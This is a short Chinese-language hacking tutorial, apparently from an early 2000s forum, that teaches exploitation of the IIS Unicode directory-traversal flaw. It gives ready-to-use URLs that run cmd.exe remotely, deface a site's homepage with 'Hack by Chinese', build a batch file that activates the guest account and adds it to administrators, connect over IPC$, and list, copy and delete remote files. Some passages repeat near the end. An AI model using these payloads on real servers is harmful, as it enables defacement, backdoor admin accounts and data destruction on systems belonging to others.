?5分钟学会黑网站

-BADBOY编写整理.(我觉得unicode漏洞最好学了~  ^____^  )

如果对放有unicodi漏洞的话：

先把c:\winnt\system32\cmd.exe  拷贝到了c:\inetpub\scripts\ccc.exe拷贝，cmd.exe(必须改名)方法：  http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe

这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe

通过http://ip/scripts/ccc.exe?/c+dir+c:\  可以看到c:\文件。

我们就可以调用到cmd.exe了，就是说不用那个编码了。  http://ip/scripts/ccc.exe?/c+echo+Hack+by+Chinese+>+c:\inetpub\wwwroot\default.asp  http://192.168.8.48/scripts/ccc.exe?/c+echo+1/5/2001+>>+c:\inetpub\wwwroot\default.asp

主页面就被修改成了：

Hack  by  Chinese

1/5/2001

也就是说，已经把他的主页黑了。

当然，我们也不能只停留在黑主页的地步，当然想进一步控制整个机器了。

方法：

编写.bat执行文件：

1.打开IE，输入：http://ip/scripts/cmd.exe?/c  dir  怎么样？有cmd.exe文件了吧？这我们就完成了第一步；

2.http://ip/scripts/cmd.exe?/c  echo  net  user  guest  /active:yes>go.bat

3.http://ip/scripts/cmd.exe?/c  echo  net  user  guest  Chinese>>go.bat

4.http://ip/scripts/cmd.exe?/c  echo  net  localgroup  administrators  /add  guest>>go.bat

5.http://ip/scripts/cmd.exe?/c  type  go.bat  看看我们的批文件内容是否如下：

net  user  guest  /active:yes

net  user  guest  Chinese

net  localgroup  administrators  /add  guest

然后在：  http://ip/scripts/go.bat

在磁盘当前位置执行.

他的guest密码就是“Chinese”  而且是超级用户。

然后你就可以:  net  use  \\ip\ipc$  "Chinese"  /user:"guest"

其余的net命令在这我就不都说了！

当然你也可以:

执行：http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\发现列出了远程主机C:\下的所有文件

执行：  http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c  +copy%20c:\autoexec.bat+c:\autoexec.bak  成功实现文件的复制，

执行：http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del%20c:\autoexec.bak  成功实现文件的删除他的guest密码就是“Chinese”  而且是超级用户。

然后你就可以:  net  use  \\ip\ipc$  "Chinese"  /user:"guest"

其余的net命令在这我就不都说了！

多謝E-BADBOY

就是不懂提高權限到ADMIN.

---

---